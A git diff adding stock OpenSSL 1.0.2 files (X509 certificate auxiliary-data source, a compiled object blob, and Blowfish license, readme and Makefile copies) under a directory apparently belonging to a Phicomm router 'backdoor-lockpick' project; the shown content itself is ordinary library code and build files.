+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+
+/*
+ * X509_CERT_AUX routines. These are used to encode additional user
+ * modifiable data about a certificate. This data is appended to the X509
+ * encoding when the *_X509_AUX routines are used. This means that the
+ * "traditional" X509 routines will simply ignore the extra data.
+ */
+
+static X509_CERT_AUX *aux_get(X509 *x);
+
+ASN1_SEQUENCE(X509_CERT_AUX) = {
+        ASN1_SEQUENCE_OF_OPT(X509_CERT_AUX, trust, ASN1_OBJECT),
+        ASN1_IMP_SEQUENCE_OF_OPT(X509_CERT_AUX, reject, ASN1_OBJECT, 0),
+        ASN1_OPT(X509_CERT_AUX, alias, ASN1_UTF8STRING),
+        ASN1_OPT(X509_CERT_AUX, keyid, ASN1_OCTET_STRING),
+        ASN1_IMP_SEQUENCE_OF_OPT(X509_CERT_AUX, other, X509_ALGOR, 1)
+} ASN1_SEQUENCE_END(X509_CERT_AUX)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_CERT_AUX)
+
+static X509_CERT_AUX *aux_get(X509 *x)
+{
+    if (!x)
+        return NULL;
+    if (!x->aux && !(x->aux = X509_CERT_AUX_new()))
+        return NULL;
+    return x->aux;
+}
+
+int X509_alias_set1(X509 *x, unsigned char *name, int len)
+{
+    X509_CERT_AUX *aux;
+    if (!name) {
+        if (!x || !x->aux || !x->aux->alias)
+            return 1;
+        ASN1_UTF8STRING_free(x->aux->alias);
+        x->aux->alias = NULL;
+        return 1;
+    }
+    if (!(aux = aux_get(x)))
+        return 0;
+    if (!aux->alias && !(aux->alias = ASN1_UTF8STRING_new()))
+        return 0;
+    return ASN1_STRING_set(aux->alias, name, len);
+}
+
+int X509_keyid_set1(X509 *x, unsigned char *id, int len)
+{
+    X509_CERT_AUX *aux;
+    if (!id) {
+        if (!x || !x->aux || !x->aux->keyid)
+            return 1;
+        ASN1_OCTET_STRING_free(x->aux->keyid);
+        x->aux->keyid = NULL;
+        return 1;
+    }
+    if (!(aux = aux_get(x)))
+        return 0;
+    if (!aux->keyid && !(aux->keyid = ASN1_OCTET_STRING_new()))
+        return 0;
+    return ASN1_STRING_set(aux->keyid, id, len);
+}
+
+unsigned char *X509_alias_get0(X509 *x, int *len)
+{
+    if (!x->aux || !x->aux->alias)
+        return NULL;
+    if (len)
+        *len = x->aux->alias->length;
+    return x->aux->alias->data;
+}
+
+unsigned char *X509_keyid_get0(X509 *x, int *len)
+{
+    if (!x->aux || !x->aux->keyid)
+        return NULL;
+    if (len)
+        *len = x->aux->keyid->length;
+    return x->aux->keyid->data;
+}
+
+int X509_add1_trust_object(X509 *x, ASN1_OBJECT *obj)
+{
+    X509_CERT_AUX *aux;
+    ASN1_OBJECT *objtmp;
+    if (!(objtmp = OBJ_dup(obj)))
+        return 0;
+    if (!(aux = aux_get(x)))
+        return 0;
+    if (!aux->trust && !(aux->trust = sk_ASN1_OBJECT_new_null()))
+        return 0;
+    return sk_ASN1_OBJECT_push(aux->trust, objtmp);
+}
+
+int X509_add1_reject_object(X509 *x, ASN1_OBJECT *obj)
+{
+    X509_CERT_AUX *aux;
+    ASN1_OBJECT *objtmp;
+    if (!(objtmp = OBJ_dup(obj)))
+        return 0;
+    if (!(aux = aux_get(x)))
+        return 0;
+    if (!aux->reject && !(aux->reject = sk_ASN1_OBJECT_new_null()))
+        return 0;
+    return sk_ASN1_OBJECT_push(aux->reject, objtmp);
+}
+
+void X509_trust_clear(X509 *x)
+{
+    if (x->aux && x->aux->trust) {
+        sk_ASN1_OBJECT_pop_free(x->aux->trust, ASN1_OBJECT_free);
+        x->aux->trust = NULL;
+    }
+}
+
+void X509_reject_clear(X509 *x)
+{
+    if (x->aux && x->aux->reject) {
+        sk_ASN1_OBJECT_pop_free(x->aux->reject, ASN1_OBJECT_free);
+        x->aux->reject = NULL;
+    }
+}
+
+ASN1_SEQUENCE(X509_CERT_PAIR) = {
+        ASN1_EXP_OPT(X509_CERT_PAIR, forward, X509, 0),
+        ASN1_EXP_OPT(X509_CERT_PAIR, reverse, X509, 1)
+} ASN1_SEQUENCE_END(X509_CERT_PAIR)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_CERT_PAIR)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_x509a.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_x509a.o
new file mode 100644
index 0000000000000000000000000000000000000000..6d9b93d8b6eb6d34e8625c362cdee4d4e6062f14
GIT binary patch
literal 7040
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
I=G~0{H#{aAW&i*H

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/COPYRIGHT b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/COPYRIGHT
new file mode 100644
index 0000000..6857223
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/COPYRIGHT
@@ -0,0 +1,46 @@
+Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+All rights reserved.
+
+This package is an Blowfish implementation written
+by Eric Young (eay@cryptsoft.com).
+
+This library is free for commercial and non-commercial use as long as
+the following conditions are aheared to.  The following conditions
+apply to all code found in this distribution.
+
+Copyright remains Eric Young's, and as such any Copyright notices in
+the code are not to be removed.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions
+are met:
+1. Redistributions of source code must retain the copyright
+   notice, this list of conditions and the following disclaimer.
+2. Redistributions in binary form must reproduce the above copyright
+   notice, this list of conditions and the following disclaimer in the
+   documentation and/or other materials provided with the distribution.
+3. All advertising materials mentioning features or use of this software
+   must display the following acknowledgement:
+   This product includes software developed by Eric Young (eay@cryptsoft.com)
+
+THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGE.
+
+The license and distribution terms for any publically available version or
+derivative of this code cannot be changed.  i.e. this code cannot simply be
+copied and put under another distrubution license
+[including the GNU Public License.]
+
+The reason behind this being stated in this direct manner is past
+experience in code simply being copied and the attribution removed
+from it and then being distributed as part of other packages. This
+implementation was a non-trivial and unpaid effort.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/INSTALL b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/INSTALL
new file mode 100644
index 0000000..3b25923
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/INSTALL
@@ -0,0 +1,14 @@
+This Eric Young's blowfish implementation, taken from his SSLeay library
+and made available as a separate library.
+ 
+The version number (0.7.2m) is the SSLeay version that this library was
+taken from.
+ 
+To build, just unpack and type make.
+If you are not using gcc, edit the Makefile.
+If you are compiling for an x86 box, try the assembler (it needs improving).
+There are also some compile time options that can improve performance,
+these are documented in the Makefile.
+ 
+eric 15-Apr-1997
+ 
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/Makefile
new file mode 100644
index 0000000..d01bfaa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/Makefile
@@ -0,0 +1,101 @@
+#
+# OpenSSL/crypto/blowfish/Makefile
+#
+
+DIR=	bf
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+BF_ENC=		bf_enc.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=bftest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=bf_skey.c bf_ecb.c bf_enc.c bf_cfb64.c bf_ofb64.c 
+LIBOBJ=bf_skey.o bf_ecb.o $(BF_ENC) bf_cfb64.o bf_ofb64.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= blowfish.h
+HEADER=	bf_pi.h bf_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+bf-586.s:	asm/bf-586.pl ../perlasm/x86asm.pl ../perlasm/cbc.pl
+	$(PERL) asm/bf-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+# We need to use force because 'install' matches 'INSTALL' on case
+# insensitive systems
+FRC.install:
+install: FRC.install
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bf_cfb64.o: ../../include/openssl/blowfish.h ../../include/openssl/e_os2.h
+bf_cfb64.o: ../../include/openssl/opensslconf.h bf_cfb64.c bf_locl.h
+bf_ecb.o: ../../include/openssl/blowfish.h ../../include/openssl/e_os2.h
+bf_ecb.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bf_ecb.o: bf_ecb.c bf_locl.h
+bf_enc.o: ../../include/openssl/blowfish.h ../../include/openssl/e_os2.h
+bf_enc.o: ../../include/openssl/opensslconf.h bf_enc.c bf_locl.h
+bf_ofb64.o: ../../include/openssl/blowfish.h ../../include/openssl/e_os2.h
+bf_ofb64.o: ../../include/openssl/opensslconf.h bf_locl.h bf_ofb64.c
+bf_skey.o: ../../include/openssl/blowfish.h ../../include/openssl/crypto.h
+bf_skey.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+bf_skey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bf_skey.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bf_skey.o: ../../include/openssl/symhacks.h bf_locl.h bf_pi.h bf_skey.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/Makefile.bak
new file mode 100644
index 0000000..d01bfaa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/Makefile.bak
@@ -0,0 +1,101 @@
+#
+# OpenSSL/crypto/blowfish/Makefile
+#
+
+DIR=	bf
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+BF_ENC=		bf_enc.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=bftest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=bf_skey.c bf_ecb.c bf_enc.c bf_cfb64.c bf_ofb64.c 
+LIBOBJ=bf_skey.o bf_ecb.o $(BF_ENC) bf_cfb64.o bf_ofb64.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= blowfish.h
+HEADER=	bf_pi.h bf_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+bf-586.s:	asm/bf-586.pl ../perlasm/x86asm.pl ../perlasm/cbc.pl
+	$(PERL) asm/bf-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+# We need to use force because 'install' matches 'INSTALL' on case
+# insensitive systems
+FRC.install:
+install: FRC.install
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bf_cfb64.o: ../../include/openssl/blowfish.h ../../include/openssl/e_os2.h
+bf_cfb64.o: ../../include/openssl/opensslconf.h bf_cfb64.c bf_locl.h
+bf_ecb.o: ../../include/openssl/blowfish.h ../../include/openssl/e_os2.h
+bf_ecb.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bf_ecb.o: bf_ecb.c bf_locl.h
+bf_enc.o: ../../include/openssl/blowfish.h ../../include/openssl/e_os2.h
+bf_enc.o: ../../include/openssl/opensslconf.h bf_enc.c bf_locl.h
+bf_ofb64.o: ../../include/openssl/blowfish.h ../../include/openssl/e_os2.h
+bf_ofb64.o: ../../include/openssl/opensslconf.h bf_locl.h bf_ofb64.c
+bf_skey.o: ../../include/openssl/blowfish.h ../../include/openssl/crypto.h
+bf_skey.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+bf_skey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bf_skey.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bf_skey.o: ../../include/openssl/symhacks.h bf_locl.h bf_pi.h bf_skey.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/Makefile.save
new file mode 100644
index 0000000..d01bfaa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/Makefile.save
@@ -0,0 +1,101 @@
+#
+# OpenSSL/crypto/blowfish/Makefile
+#
+
+DIR=	bf
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+BF_ENC=		bf_enc.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=bftest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=bf_skey.c bf_ecb.c bf_enc.c bf_cfb64.c bf_ofb64.c 
+LIBOBJ=bf_skey.o bf_ecb.o $(BF_ENC) bf_cfb64.o bf_ofb64.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= blowfish.h
+HEADER=	bf_pi.h bf_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+bf-586.s:	asm/bf-586.pl ../perlasm/x86asm.pl ../perlasm/cbc.pl
+	$(PERL) asm/bf-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+# We need to use force because 'install' matches 'INSTALL' on case
+# insensitive systems
+FRC.install:
+install: FRC.install
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bf_cfb64.o: ../../include/openssl/blowfish.h ../../include/openssl/e_os2.h
+bf_cfb64.o: ../../include/openssl/opensslconf.h bf_cfb64.c bf_locl.h
+bf_ecb.o: ../../include/openssl/blowfish.h ../../include/openssl/e_os2.h
+bf_ecb.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bf_ecb.o: bf_ecb.c bf_locl.h
+bf_enc.o: ../../include/openssl/blowfish.h ../../include/openssl/e_os2.h
+bf_enc.o: ../../include/openssl/opensslconf.h bf_enc.c bf_locl.h
+bf_ofb64.o: ../../include/openssl/blowfish.h ../../include/openssl/e_os2.h
+bf_ofb64.o: ../../include/openssl/opensslconf.h bf_locl.h bf_ofb64.c
+bf_skey.o: ../../include/openssl/blowfish.h ../../include/openssl/crypto.h
+bf_skey.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+bf_skey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bf_skey.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bf_skey.o: ../../include/openssl/symhacks.h bf_locl.h bf_pi.h bf_skey.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/README
new file mode 100644
index 0000000..f2712fd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/README
@@ -0,0 +1,8 @@
+This is a quick packaging up of my blowfish code into a library.
+It has been lifted from SSLeay.
+The copyright notices seem a little harsh because I have not spent the
+time to rewrite the conditions from the normal SSLeay ones.
+
+Basically if you just want to play with the library, not a problem.
+
+eric 15-Apr-1997
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/VERSION b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/VERSION
new file mode 100644
index 0000000..be99585
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/VERSION
@@ -0,0 +1,6 @@
+The version numbers will follow my SSL implementation
+
+0.7.2r - Some reasonable default compiler options from 
+	Peter Gutman <pgut001@cs.auckland.ac.nz>
+
+0.7.2m - the first release
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/asm/bf-586.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/asm/bf-586.pl
new file mode 100644
index 0000000..b74cfba
--- /dev/null
